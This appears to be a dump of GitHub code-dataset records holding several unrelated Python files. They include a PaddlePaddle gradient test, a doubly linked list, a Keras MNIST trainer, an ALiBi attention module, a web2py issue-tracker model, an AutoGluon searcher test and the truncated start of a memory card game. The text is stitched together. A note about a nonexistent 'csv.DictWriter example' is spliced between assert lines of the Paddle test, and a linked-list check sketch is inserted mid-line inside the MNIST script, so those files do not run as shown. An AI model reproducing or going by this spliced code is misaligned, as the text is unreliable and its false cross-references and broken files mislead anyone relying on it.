original_in2)\n out.retain_grads()\n original_in1 = out\n sum_out_value = sum_out.numpy()\n sum_out.backward()\n dyout = out.gradient()\n original_in1.stop_gradient = True\n rt.clear_gradients()\n\n with base.dygraph.guard():\n base.default_startup_program().random_seed = seed\n base.default_main_program().random_seed = seed\n original_in1 = to_variable(original_np1)\n original_in2 = to_variable(original_np2)\n original_in1.stop_gradient = False\n original_in2.stop_gradient = False\n rt = RecurrentTest(\"RecurrentTest\")\n\n for i in range(3):\n sum_out, out = rt(original_in1, original_in2)\n out.retain_grads()\n original_in1 = out\n eager_sum_out_value = sum_out.numpy()\n sum_out.backward()\n eager_dyout = out.gradient()\n original_in1.stop_gradient = True\n rt.clear_gradients()\n\n with new_program_scope():\n base.default_startup_program().random_seed = seed\n base.default_main_program().random_seed = seed\n in1 = paddle.static.data(name=\"inp1\", shape=[2, 2])\n in1.stop_gradient = False\n in2 = paddle.static.data(name=\"inp2\", shape=[2, 2])\n in2.stop_gradient = False\n rt1 = RecurrentTest(\"RecurrentTest\")\n static_sum_out, static_out = rt1(in1, in2)\n base.backward.append_backward(static_sum_out)\n exe = base.Executor(\n base.CPUPlace()\n if not core.is_compiled_with_cuda()\n else base.CUDAPlace(0)\n )\n\n static_dout = (\n base.default_main_program()\n .block(0)\n ._find_var_recursive(static_out.name + \"@GRAD\")\n )\n fetch_list = [static_sum_out, static_out, static_dout]\n for i in range(3):\n out = exe.run(\n base.default_main_program(),\n feed={\"inp1\": original_np1, \"inp2\": original_np2},\n fetch_list=fetch_list,\n )\n static_out_value = out[1]\n static_sum_out = out[0]\n static_dout = out[2]\n original_np1 = static_out_value\n\n np.testing.assert_array_equal(static_sum_out, sum_out_value)\n np.testing.assert_array_equal(static_sum_out, eager_sum_out_value)\n 
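(A follow-up sketch for the csv.DictWriter example above, not part of the original script: reading the file back with csv.DictReader, which yields one dict per row keyed by the header written by writeheader().)

```python
import csv

# Read robot1.csv back; DictReader uses the first row as the field names.
with open('robot1.csv', newline='') as f:
    for row in csv.DictReader(f):
        print(row['column1'], row['column2'], row['column3'])
```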
np.testing.assert_array_equal(static_dout, dyout)\n        np.testing.assert_array_equal(static_dout, eager_dyout)\n\n\nif __name__ == '__main__':\n    paddle.enable_static()\n    unittest.main()\n","repo_name":"PaddlePaddle/Paddle","sub_path":"test/legacy_test/test_imperative_recurrent_usage.py","file_name":"test_imperative_recurrent_usage.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":21032,"dataset":"github-code","pt":"29"} +{"seq_id":"16589881705","text":"#!/usr/bin/env python3\n\nclass Node:\n\n    def __init__(self, name, age, sex):\n        self.name = name\n        self.age = age\n        self.sex = sex\n        self.next = None\n        self.prev = None\n\n\nclass DoublyLinkedList:\n\n    def __init__(self):\n        self.head = None\n\n    def length(self):\n        # Count every node, including the last one; also safe on an empty\n        # list (the original dereferenced cur.next when cur could be None).\n        cur = self.head\n        total = 0\n        while cur is not None:\n            total += 1\n            cur = cur.next\n        return total\n    \n    # insert node at the front\n    def insert_front(self, name, age, sex):\n\n        new_node = Node(name, age, sex)\n        new_node.next = self.head\n        if self.head is not None:\n            self.head.prev = new_node\n        self.head = new_node\n\n    def insert_after(self, prev_node, name, age, sex):\n        cur_node = self.head\n        pos = 1\n        # Walk the list until reaching position prev_node (the original\n        # used `if`, so it never advanced more than one step)\n        while pos <= prev_node:\n            cur_node = cur_node.next\n            pos += 1\n        new_node = Node(name, age, sex)\n        new_node.next = cur_node.next\n        cur_node.next = new_node\n        new_node.prev = cur_node\n        if new_node.next:\n            new_node.next.prev = new_node\n\n    def insert_end(self, name, age, sex):\n        new_node = Node(name, age, sex)\n        if self.head is None:\n            self.head = new_node\n            return\n        temp = self.head\n        while temp.next:\n            temp = temp.next\n        temp.next = new_node\n        new_node.prev = temp\n        return\n\n    def deleteNode(self, dele):\n        if self.head is None or dele is None:\n            return\n        if self.head == dele:\n            self.head = dele.next\n        if dele.next is not None:\n            dele.next.prev = dele.prev\n        if dele.prev is not None:\n            dele.prev.next = dele.next\n\n    def display_list(self):\n        cur_node = self.head\n        while cur_node is not None:\n            print(\"Name: {}\\nAge: {}\\nSex: {}\\n\".format(\n                cur_node.name, cur_node.age, cur_node.sex))\n            cur_node = cur_node.next\n\n\n# initialize an empty list\nmy_list = DoublyLinkedList()\n\nmy_list.insert_end(\"Mzee John\", 30, \"Male\")\nmy_list.insert_front(\"Mukasa Joseph\", 27, \"Male\")\nmy_list.insert_front(\"Cecilia Tusingwire\", 24, \"Female\")\nmy_list.insert_end(\"Charles Mwesige\", 32, \"Male\")\n\n# index = 4\n# my_list.insert_after(1, \"Aaron\", 20, \"Male\")\n\nmy_list.insert_after(1, \"Karungi\", 23, \"Female\")\n\nmy_list.display_list()\n\n# my_list.deleteNode(my_list.head.next.next.next.next.next)\n\nprint()\n# my_list.display_list()\n","repo_name":"Mzee1991/Python-Training","sub_path":"Doub-l-2.py","file_name":"Doub-l-2.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"11512382871","text":"import tensorflow as tf  # deep learning library. 
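(A hedged sanity-check sketch, not in the original file: after the insert and delete calls on the doubly linked list above, walk to the tail and back to confirm that the next and prev pointers agree.)

```python
def check_links(dll):
    # Collect names walking forward, remembering the tail node.
    forward, node, tail = [], dll.head, None
    while node is not None:
        forward.append(node.name)
        tail = node
        node = node.next
    # Walk backward from the tail via the prev pointers.
    backward = []
    while tail is not None:
        backward.append(tail.name)
        tail = tail.prev
    return forward == list(reversed(backward))

print(check_links(my_list))  # True when both link directions are consistent
```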
Tensors are just multi-dimensional arrays\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n\nnp.random.seed(2)\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\n\n\nfrom keras.utils.np_utils import to_categorical # convert to one-hot-encoding\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D\nfrom keras.optimizers import RMSprop\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ReduceLROnPlateau\n\ntrain = pd.read_csv(\"data/mnist_train.csv\")\ntest = pd.read_csv(\"data/mnist_test.csv\")\n\nY_train = train[\"label\"]\nX_train = train.drop(labels = [\"label\"],axis = 1) \nY_test = test[\"label\"]\nX_test = test.drop(labels = [\"label\"],axis = 1) \n\nX_train = X_train / 255.0\nX_test = X_test / 255.0\n\nX_train = X_train.values.reshape(-1,28,28,1)\nX_test = X_test.values.reshape(-1,28,28,1)\n\nY_train = to_categorical(Y_train, num_classes = 10)\nY_test = to_categorical(Y_test,num_classes = 10)\nrandom_seed = 2\nX_train, X_val, Y_train, Y_val = train_test_split(X_train, Y_train, test_size = 0.1, random_state=random_seed)\n\nmodel = Sequential()\n\nmodel.add(Conv2D(filters = 32, kernel_size = (5,5),padding = 'Same', \n activation ='relu', input_shape = (28,28,1)))\nmodel.add(Conv2D(filters = 32, kernel_size = (5,5),padding = 'Same', \n activation ='relu'))\nmodel.add(MaxPool2D(pool_size=(2,2)))\nmodel.add(Dropout(0.25))\n\n\nmodel.add(Conv2D(filters = 64, kernel_size = (3,3),padding = 'Same', \n activation ='relu'))\nmodel.add(Conv2D(filters = 64, kernel_size = (3,3),padding = 'Same', \n activation ='relu'))\nmodel.add(MaxPool2D(pool_size=(2,2), strides=(2,2)))\nmodel.add(Dropout(0.25))\n\n\nmodel.add(Flatten())\nmodel.add(Dense(256, activation = \"relu\"))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation = \"softmax\"))\n\noptimizer = RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)\nmodel.compile(optimizer = optimizer , loss = \"categorical_crossentropy\", metrics=[\"accuracy\"])\n\nlearning_rate_reduction = ReduceLROnPlateau(monitor='val_accuracy', \n patience=3, \n verbose=1, \n factor=0.5, \n min_lr=0.00001)\n\nepochs = 3 # Turn epochs to 30 to get 0.9967 accuracy\nbatch_size = 86\n\ndatagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)\n zoom_range = 0.1, # Randomly zoom image \n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=False, # randomly flip images\n vertical_flip=False) # randomly flip images\n\ndatagen.fit(X_train)\n\nhistory = model.fit_generator(datagen.flow(X_train,Y_train, batch_size=batch_size),\n epochs = epochs, validation_data = (X_val,Y_val),\n verbose = 2, steps_per_epoch=X_train.shape[0] // batch_size\n , callbacks=[learning_rate_reduction])\n\nval_loss, val_acc = model.evaluate(X_test, Y_test) # evaluate the out of sample data with model\nprint(val_loss) # model's loss (error)\nprint(val_acc) # model's 
accuracy\nmodel.save('désespoir.h5')\n\n","repo_name":"Tateuf/AI_project","sub_path":"web_app/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"70864049359","text":"\"\"\"\n---\ntitle: Attention with Linear Biases (ALiBi)\nsummary: >\n  Documented implementation with explanations of Attention with Linear Biases (ALiBi)\n---\n\n# Attention with Linear Biases (ALiBi)\n\nThis is an implementation of Attention with Linear Biases (ALiBi) from the paper\n[Train Short, Test Long: Attention with Linear Biases Enables Input Length Extrapolation](https://papers.labml.ai/paper/2108.12409).\n\nThis replaces positional encodings with biases added to attention scores (attention logits, before the softmax).\nThis is a relative scheme tested on autoregressive tasks, and the bias is higher for nearby tokens\nand lower for far-away tokens.\nThe biases decrease linearly in the log scale (because it's before the softmax) and each head has a different slope.\n\nHere's the attention formula for $i$-th token,\n\n\\begin{align}\n\\mathbf{a}_i\n&= \\text{softmax} \\bigg( \\mathbf{q}_i \\mathbf{K}^\\top + m \\cdot \\big[-(i-1), \\dots, 1, 0 \\big] \\bigg) \\\\\n&= \\text{softmax} \\bigg( \\mathbf{q}_i \\mathbf{K}^\\top + m \\cdot \\big[0, 1, \\dots, (i - 1) \\big] \\bigg)\n\\end{align}\n\nwhere $\\mathbf{q}_i \\in \\mathbb{R}^d$ is the query of the $i$-th token, $K \\in \\mathbb{R}^{i \\times d}$ are the keys\nup to $i$, and $d$ is the number of features per head.\nNote that the above equality holds because $\\text{softmax}$ is invariant to translations\n (you can add any constant to all elements without changing the result).\n\nHere is [the training code](experiment.html) for an ALiBi model.\n\"\"\"\nimport math\nfrom typing import Optional\n\nimport torch\nfrom torch import nn\nfrom typing import List\n\nclass PrepareForMultiHeadAttention(nn.Module):\n    \"\"\"\n    \n\n    ## Prepare for multi-head attention\n\n    This module does a linear transformation and splits the vector into given\n    number of heads for multi-head attention.\n    This is used to transform **key**, **query**, and **value** vectors.\n    \"\"\"\n\n    def __init__(self, d_model: int, heads: int, d_k: int, bias: bool):\n        super().__init__()\n        # Linear layer for linear transform\n        self.linear = nn.Linear(d_model, heads * d_k, bias=bias)\n        # Number of heads\n        self.heads = heads\n        # Number of dimensions in vectors in each head\n        self.d_k = d_k\n\n    def forward(self, x: torch.Tensor):\n        # Input has shape `[seq_len, batch_size, d_model]` or `[batch_size, d_model]`.\n        # We apply the linear transformation to the last dimension and split that into\n        # the heads.\n        head_shape = x.shape[:-1]\n\n        # Linear transform\n        x = self.linear(x)\n\n        # Split last dimension into heads\n        x = x.view(*head_shape, self.heads, self.d_k)\n\n        # Output has shape `[seq_len, batch_size, heads, d_k]` or `[batch_size, heads, d_model]`\n        return x\n\n\nclass MultiHeadAttention(nn.Module):\n    r\"\"\"\n    \n\n    ## Multi-Head Attention Module\n\n    This computes scaled multi-headed attention for given `query`, `key` and `value` vectors.\n\n    $$\\mathop{Attention}(Q, K, V) = \\underset{seq}{\\mathop{softmax}}\\Bigg(\\frac{Q K^\\top}{\\sqrt{d_k}}\\Bigg)V$$\n\n    In simple terms, it finds keys that match the query, and gets the values of\n    those keys.\n\n    It uses dot-product of query and key as the indicator of how matching they are.\n    Before taking the $softmax$ the 
dot-products are scaled by $\\frac{1}{\\sqrt{d_k}}$.\n This is done to avoid large dot-product values causing softmax to\n give very small gradients when $d_k$ is large.\n\n Softmax is calculated along the axis of of the sequence (or time).\n \"\"\"\n\n def __init__(self, heads: int, d_model: int, dropout_prob: float = 0.1, bias: bool = True):\n \"\"\"\n * `heads` is the number of heads.\n * `d_model` is the number of features in the `query`, `key` and `value` vectors.\n \"\"\"\n\n super().__init__()\n\n # Number of features per head\n self.d_k = d_model // heads\n # Number of heads\n self.heads = heads\n\n # These transform the `query`, `key` and `value` vectors for multi-headed attention.\n self.query = PrepareForMultiHeadAttention(d_model, heads, self.d_k, bias=bias)\n self.key = PrepareForMultiHeadAttention(d_model, heads, self.d_k, bias=bias)\n self.value = PrepareForMultiHeadAttention(d_model, heads, self.d_k, bias=True)\n\n # Softmax for attention along the time dimension of `key`\n self.softmax = nn.Softmax(dim=1)\n\n # Output layer\n self.output = nn.Linear(d_model, d_model)\n # Dropout\n self.dropout = nn.Dropout(dropout_prob)\n # Scaling factor before the softmax\n self.scale = 1 / math.sqrt(self.d_k)\n\n # We store attentions so that it can be used for logging, or other computations if needed\n self.attn = None\n\n def get_scores(self, query: torch.Tensor, key: torch.Tensor):\n \"\"\"\n ### Calculate scores between queries and keys\n\n This method can be overridden for other variations like relative attention.\n \"\"\"\n\n # Calculate $Q K^\\top$ or $S_{ijbh} = \\sum_d Q_{ibhd} K_{jbhd}$\n return torch.einsum('ibhd,jbhd->ijbh', query, key)\n\n def prepare_mask(self, mask: torch.Tensor, query_shape: List[int], key_shape: List[int]):\n \"\"\"\n `mask` has shape `[seq_len_q, seq_len_k, batch_size]`, where first dimension is the query dimension.\n If the query dimension is equal to $1$ it will be broadcasted.\n \"\"\"\n\n assert mask.shape[0] == 1 or mask.shape[0] == query_shape[0]\n assert mask.shape[1] == key_shape[0]\n assert mask.shape[2] == 1 or mask.shape[2] == query_shape[1]\n\n # Same mask applied to all heads.\n mask = mask.unsqueeze(-1)\n\n # resulting mask has shape `[seq_len_q, seq_len_k, batch_size, heads]`\n return mask\n\n def forward(self, *,\n query: torch.Tensor,\n key: torch.Tensor,\n value: torch.Tensor,\n mask: Optional[torch.Tensor] = None):\n \"\"\"\n `query`, `key` and `value` are the tensors that store\n collection of *query*, *key* and *value* vectors.\n They have shape `[seq_len, batch_size, d_model]`.\n\n `mask` has shape `[seq_len, seq_len, batch_size]` and\n `mask[i, j, b]` indicates whether for batch `b`,\n query at position `i` has access to key-value at position `j`.\n \"\"\"\n\n # `query`, `key` and `value` have shape `[seq_len, batch_size, d_model]`\n seq_len, batch_size, _ = query.shape\n\n if mask is not None:\n mask = self.prepare_mask(mask, query.shape, key.shape)\n\n # Prepare `query`, `key` and `value` for attention computation.\n # These will then have shape `[seq_len, batch_size, heads, d_k]`.\n query = self.query(query)\n key = self.key(key)\n value = self.value(value)\n\n # Compute attention scores $Q K^\\top$.\n # This gives a tensor of shape `[seq_len, seq_len, batch_size, heads]`.\n scores = self.get_scores(query, key)\n\n # Scale scores $\\frac{Q K^\\top}{\\sqrt{d_k}}$\n scores *= self.scale\n\n # Apply mask\n if mask is not None:\n scores = scores.masked_fill(mask == 0, float('-inf'))\n\n # $softmax$ attention along the key sequence 
dimension\n # $\\underset{seq}{softmax}\\Bigg(\\frac{Q K^\\top}{\\sqrt{d_k}}\\Bigg)$\n attn = self.softmax(scores)\n\n # Apply dropout\n attn = self.dropout(attn)\n\n # Multiply by values\n # $$\\underset{seq}{softmax}\\Bigg(\\frac{Q K^\\top}{\\sqrt{d_k}}\\Bigg)V$$\n x = torch.einsum(\"ijbh,jbhd->ibhd\", attn, value)\n\n # Save attentions for any other calculations\n self.attn = attn.detach()\n\n # Concatenate multiple heads\n x = x.reshape(seq_len, batch_size, -1)\n\n # Output layer\n return self.output(x)\n\ndef get_slopes(n_heads: int):\n \"\"\"\n ## Get head-specific slope $m$ for each head\n\n * `n_heads` is the number of heads in the attention layer $n$\n\n The slope for the first head is\n\n $$\\frac{1}{2^{\\frac{8}{n}}} = 2^{-\\frac{8}{n}}$$\n\n The slopes for the rest of the heads are in a geometric series with the same ratio as above.\n\n For instance when the number of heads is $8$ the slopes are\n $$\\frac{1}{2^1}, \\frac{1}{2^2}, \\dots, \\frac{1}{2^8}$$\n \"\"\"\n\n # Get the closest power of 2 to `n_heads`.\n # If `n_heads` is not a power of 2, then we first calculate slopes to the closest (smaller) power of 2,\n # and then add the remaining slopes.\n n = 2 ** math.floor(math.log2(n_heads))\n # $2^{-\\frac{8}{n}}$\n m_0 = 2.0 ** (-8.0 / n)\n # $2^{-1\\frac{8}{n}}, 2^{-2 \\frac{8}{n}}, 2^{-3 \\frac{8}{n}}, \\dots$\n m = torch.pow(m_0, torch.arange(1, 1 + n))\n\n # If `n_heads` is not a power of 2, then we add the remaining slopes.\n # We calculate the remaining slopes for $n * 2$ (avoiding slopes added previously).\n # And pick the slopes up to `n_heads`.\n if n < n_heads:\n # $2^{-\\frac{8}{2n}}$\n m_hat_0 = 2.0 ** (-4.0 / n)\n # $2^{-1\\frac{8}{2n}}, 2^{-3 \\frac{8}{2n}}, 2^{-5 \\frac{8}{2n}}, \\dots$\n # Note that we take steps by $2$ to avoid slopes added previously.\n m_hat = torch.pow(m_hat_0, torch.arange(1, 1 + 2 * (n_heads - n), 2))\n # Concatenate the slopes with the remaining slopes.\n m = torch.cat([m, m_hat])\n\n return m\n\n\n@torch.no_grad()\ndef get_alibi_biases(n_heads: int, mask: torch.Tensor):\n \"\"\"\n ## Calculate the attention biases matrix\n\n * `n_heads` is the number of heads in the attention layer\n * `mask` is the attention mask of shape `[seq_len_q, seq_len_k]`\n\n This returns a matrix of shape `[seq_len_q, seq_len_k, n_heads]` with ALiBi attention biases.\n \"\"\"\n\n # Get slopes $m$ for each head\n m = get_slopes(n_heads).to(mask.device)\n\n # Calculate distances $[0, 1, \\dots, N]$\n # Here we calculate the distances using the mask.\n #\n # Since it's a causal mask we can just use $[0, 1, \\dots, N]$ too.\n # `distance = torch.arange(mask.shape[1], dtype=torch.long, device=mask.device)[None, :]`\n distance = mask.cumsum(dim=-1)\n\n # Multiply them pair-wise to get the ALiBi bias matrix\n return distance[:, :, None] * m[None, None, :]\n\n\nclass AlibiMultiHeadAttention(MultiHeadAttention):\n \"\"\"\n ## Attention with Linear Biases (ALiBi)\n\n We override [Multi-Head Attention](../mha.html).\n \"\"\"\n\n def __init__(self, heads: int, d_model: int, dropout_prob: float = 0.1):\n super().__init__(heads, d_model, dropout_prob)\n\n # To cache the ALiBi biases\n self.alibi_biases = None\n\n def forward(self, *,\n query: torch.Tensor,\n key: torch.Tensor,\n value: torch.Tensor,\n mask: Optional[torch.Tensor] = None):\n \"\"\"\n `query`, `key` and `value` are the tensors that store\n collection of *query*, *key* and *value* vectors.\n They have shape `[seq_len, batch_size, d_model]`.\n\n `mask` has shape `[seq_len, 
seq_len, batch_size]` and\n `mask[i, j, b]` indicates whether for batch `b`,\n query at position `i` has access to key-value at position `j`.\n \"\"\"\n\n # ALiBi only works with causal masks.\n assert mask is not None\n assert mask.shape[0] == mask.shape[1] and mask.shape[2] == 1\n\n # `query`, `key` and `value` have shape `[seq_len, batch_size, d_model]`\n seq_len, batch_size, _ = query.shape\n\n # Add head dimension to mask and check its shape.\n mask = self.prepare_mask(mask, query.shape, key.shape)\n\n # Prepare `query`, `key` and `value` for attention computation.\n # These will then have shape `[seq_len, batch_size, heads, d_k]`.\n query = self.query(query)\n key = self.key(key)\n value = self.value(value)\n\n # Compute attention scores $Q K^\\top$.\n # This gives a tensor of shape `[seq_len, seq_len, batch_size, heads]`.\n scores = self.get_scores(query, key)\n\n # Scale scores $\\frac{Q K^\\top}{\\sqrt{d_k}}$\n scores *= self.scale\n\n # Create ALiBi biases if they are not cached\n if self.alibi_biases is None or self.alibi_biases.shape[1] < seq_len:\n # `mask` has shape [seq_len, seq_len, 1, 1]\n self.alibi_biases = get_alibi_biases(scores.shape[-1], mask[:, :, 0, 0])\n\n # Add ALiBi biases to attention scores.\n # ALiBi biases have shape `[seq_len, seq_len, n_heads]`\n # and `scores` has shape `[seq_len, seq_len, batch_size, n_heads]`\n scores += self.alibi_biases[:seq_len, :seq_len, None, :]\n\n # Apply mask\n scores = scores.masked_fill(mask == 0, float('-inf'))\n\n # $softmax$ attention along the key sequence dimension\n # $\\underset{seq}{softmax}\\Bigg(\\frac{Q K^\\top}{\\sqrt{d_k}}\\Bigg)$\n attn = self.softmax(scores)\n\n # Apply dropout\n attn = self.dropout(attn)\n\n # Multiply by values\n # $$\\underset{seq}{softmax}\\Bigg(\\frac{Q K^\\top}{\\sqrt{d_k}}\\Bigg)V$$\n x = torch.einsum(\"ijbh,jbhd->ibhd\", attn, value)\n\n # Concatenate multiple heads\n x = x.reshape(seq_len, batch_size, -1)\n\n # Output layer\n return self.output(x)\n\n","repo_name":"Looyyd/Machine-Learning-Toys","sub_path":"alibi.py","file_name":"alibi.py","file_ext":"py","file_size_in_byte":13264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29586293740","text":"from gluon.tools import prettydate\nfrom gluon.sqlhtml import form_factory\nimport os\nimport pickle\nimport hashlib\nimport operator\nimport shutil\n\nIS_ISSUE_SERVER = True if os.path.exists(os.path.join(request.folder, 'ISSUE_SERVER')) else False\nAPPLICATION_URL = \"http://biographer.biologie.hu-berlin.de/biographer\"\n\nJS = lambda x: SCRIPT(x, _type=\"text/javascript\")\n\ndb.define_table('plugin_issue_error',\n Field('hash'),\n Field('ticket', 'list:string'),\n Field('origin'),\n Field('summary'),\n Field('traceback', 'text'),\n )\n\ndb.define_table('plugin_issue',\n Field('open', 'boolean', default=True),\n Field('accept', 'boolean', default=False),\n Field('views', 'integer', default = 0, readable=False, writable=False),\n Field('assign_to', 'list:reference auth_user'),\n Field('error', 'list:reference plugin_issue_error'),\n Field('type', 'list:string'),\n )\ndb.define_table('plugin_issue_comment',\n Field('issue', db.plugin_issue, readable = False, writable = False),\n Field('title', length=160),\n Field('body', 'text', requires=IS_NOT_EMPTY()),\n Field('nickname'),\n Field('email', requires=IS_EMPTY_OR(IS_EMAIL())),\n Field('created_by', db.auth_user, readable = False, writable = False),\n Field('created_on', 'datetime', default=request.now, readable = False, writable = 
False),\n )\ndb.define_table('plugin_issue_type',\n Field('type'),\n )\ndb.define_table('plugin_issue_vote',\n Field('issue', db.plugin_issue),\n Field('created_by', db.auth_user),\n Field('score', 'integer'),\n )\ndb.define_table('plugin_issue_comment_attachment',\n Field('comment', db.plugin_issue_comment),\n Field('file', 'upload'),\n )\ndb.define_table('plugin_issue_comment_vote',\n Field('comment', db.plugin_issue_comment),\n Field('created_by', db.auth_user),\n Field('up_down', 'boolean'),\n )\n\n#initial setup of some types, types are more like tags\nif not db(db.plugin_issue_type.id>0).count():\n db.plugin_issue_type.insert(type = 'bug')\n db.plugin_issue_type.insert(type = 'proposal')\n db.plugin_issue_type.insert(type = 'help')\n\ndef get_score(issue_id):\n all_votes = db(db.plugin_issue_vote.issue == issue_id).select(db.plugin_issue_vote.score)\n return sum([r.score for r in all_votes]) if all_votes else 0\n\ndef get_hash2error():\n hash2error = dict()\n error_files_base = os.path.join(request.folder,'errors')\n for fn in os.listdir(error_files_base):\n record = db(db.plugin_issue_error.ticket.contains(fn)).select().first()\n if record:#found ticket in db\n thehash = record.hash\n try:\n hash2error[thehash]['count'] += 1\n except KeyError:\n hash2error[thehash] = dict(count = 1, origin = record.origin, summary = record.summary, traceback = record.traceback, hash = record.hash)\n else:#not found by filename\n try:\n error = pickle.load(open(os.path.join(error_files_base,fn),'r'))\n except IOError:\n continue\n thehash = hashlib.md5(error['traceback']).hexdigest()\n try:\n hash2error[thehash]['count'] += 1\n except KeyError:\n error_lines = error['traceback'].split(\"\\n\")\n last_line = error_lines[-2]\n error_causer = os.path.split(error['layer'])[1]\n hash2error[thehash] = dict(count = 1, origin = error_causer, summary = last_line, hash = thehash, traceback = error['traceback'])\n record = db(db.plugin_issue_error.hash == thehash).select().first()\n if record:#found by hash\n record.update_record(ticket = record.ticket+[fn])\n else:#not found by hash, add now\n record_id = db.plugin_issue_error.insert(hash = thehash, ticket = [fn], origin = error_causer, summary = last_line, traceback = error['traceback'])\n hash2error[thehash]['record_id'] = record.id if record else record_id\n return hash2error\n","repo_name":"biographer/biographer","sub_path":"editor/models/plugin_issue.py","file_name":"plugin_issue.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"6382803134","text":"from math import isclose\nfrom numbers import Number\n\nfrom autogluon.common import space\nfrom autogluon.core.searcher import LocalRandomSearcher\n\n\ndef dictsAlmostEqual(dict1, dict2, rel_tol=1e-8):\n if len(dict1) != len(dict2):\n return False\n for key, item in dict1.items():\n if isinstance(item, dict):\n if not dictsAlmostEqual(dict1[key], dict2[key], rel_tol=rel_tol):\n return False\n else:\n if isinstance(item, Number):\n if not isclose(dict1[key], dict2[key], rel_tol=rel_tol):\n return False\n else:\n if not (dict1[key] == dict2[key]):\n return False\n return True\n\n\ndef test_local_random_searcher():\n search_space = dict(\n a=space.Real(0, 1, default=0.2),\n b=space.Real(0.05, 1, default=0.4, log=True),\n c=space.Int(5, 15),\n d=space.Int(7, 23, default=16),\n e=space.Categorical(\"a\", 7, [\"hello\", 2]),\n )\n\n searcher = LocalRandomSearcher(search_space=search_space)\n\n expected_config_1 = {\"a\": 0.2, \"b\": 0.4, 
\"c\": 5, \"d\": 16, \"e\": \"a\"}\n expected_config_2 = {\"a\": 0.5488135039273248, \"b\": 0.4260424000595025, \"c\": 8, \"d\": 10, \"e\": 7}\n expected_config_3 = {\"a\": 0.6235636967859723, \"b\": 0.15814742875130683, \"c\": 12, \"d\": 13, \"e\": \"a\"}\n expected_config_4 = {\"a\": 0.9636627605010293, \"b\": 0.1577026248478398, \"c\": 11, \"d\": 14, \"e\": [\"hello\", 2]}\n expected_config_5 = {\"a\": 0.5680445610939323, \"b\": 0.800200824711684, \"c\": 13, \"d\": 16, \"e\": \"a\"}\n\n assert searcher.get_best_reward() == float(\"-inf\")\n config1 = searcher.get_config()\n assert searcher.get_reward(config1) == float(\"-inf\")\n assert searcher.get_best_reward() == float(\"-inf\")\n searcher.update(config1, reward=0.2)\n assert searcher.get_reward(config1) == 0.2\n assert searcher.get_best_reward() == 0.2\n assert searcher.get_best_config() == config1\n\n config2 = searcher.get_config()\n\n config3 = searcher.get_config()\n\n config4 = searcher.get_config()\n searcher.update(config4, reward=0.1)\n assert searcher.get_reward(config4) == 0.1\n assert searcher.get_best_reward() == 0.2\n assert searcher.get_best_config() == config1\n searcher.update(config4, reward=0.5)\n assert searcher.get_reward(config4) == 0.5\n assert searcher.get_best_reward() == 0.5\n assert searcher.get_best_config() == config4\n\n config5 = searcher.get_config()\n\n assert dictsAlmostEqual(expected_config_1, config1)\n assert dictsAlmostEqual(expected_config_2, config2)\n assert dictsAlmostEqual(expected_config_3, config3)\n assert dictsAlmostEqual(expected_config_4, config4)\n assert dictsAlmostEqual(expected_config_5, config5)\n\n assert len(searcher._results) == 5\n","repo_name":"autogluon/autogluon","sub_path":"core/tests/unittests/searcher/test_local_random_searcher.py","file_name":"test_local_random_searcher.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":6431,"dataset":"github-code","pt":"29"} +{"seq_id":"39388018971","text":"from yanntricks import *\ndef CbCartTuii():\n pspict,fig = SinglePicture(\"CbCartTuii\")\n pspict.dilatation(2)\n\n x=var('x')\n f1=phyFunction(cos(x)**2)\n f2=phyFunction(cos(x)**3*sin(x))\n\n courbe=ParametricCurve(f1,f2).graph(0,2*pi)\n \n\n pspict.DrawGraphs(courbe)\n pspict.DrawDefaultAxes()\n fig.conclude()\n fig.write_the_file()\n\n","repo_name":"LaurentClaessens/mazhe","sub_path":"src_yanntricks/yanntricksCbCartTuii.py","file_name":"yanntricksCbCartTuii.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"29"} +{"seq_id":"22805201932","text":"'''Starts a game of Memory (card matching) played via interactive console input'''\n\nimport random\nimport time\nimport os\nimport deck\n\ndef get_card_number(i):\n '''Returns a string to print for the card # (aesthetic)'''\n if i > 9:\n return \" {} \".format(i)\n return \" {} \".format(i)\n\ndef get_val_to_print(value):\n '''Returns a string that can be printed for the value (aesthetic)'''\n if value == \"10\":\n return \"| 10 |\"\n\n return \"| {} |\".format(value)\n\ndef get_suit_to_print(suit):\n '''Returns a string that can be printed for the suit (aesthetic)'''\n if suit == \"Hearts\":\n return \"| Hearts |\"\n if suit == \"Spades\":\n return \"| Spades |\"\n if suit == \"Clubs\":\n return \"| Clubs |\"\n if suit == \"Diamonds\":\n return \"|Diamonds|\"\n\n return \"\"\n\ndef show_cards(game_state, moves):\n '''Print out the game state and the cards to the console'''\n for i in range(0, 12, 3):\n card1 = 
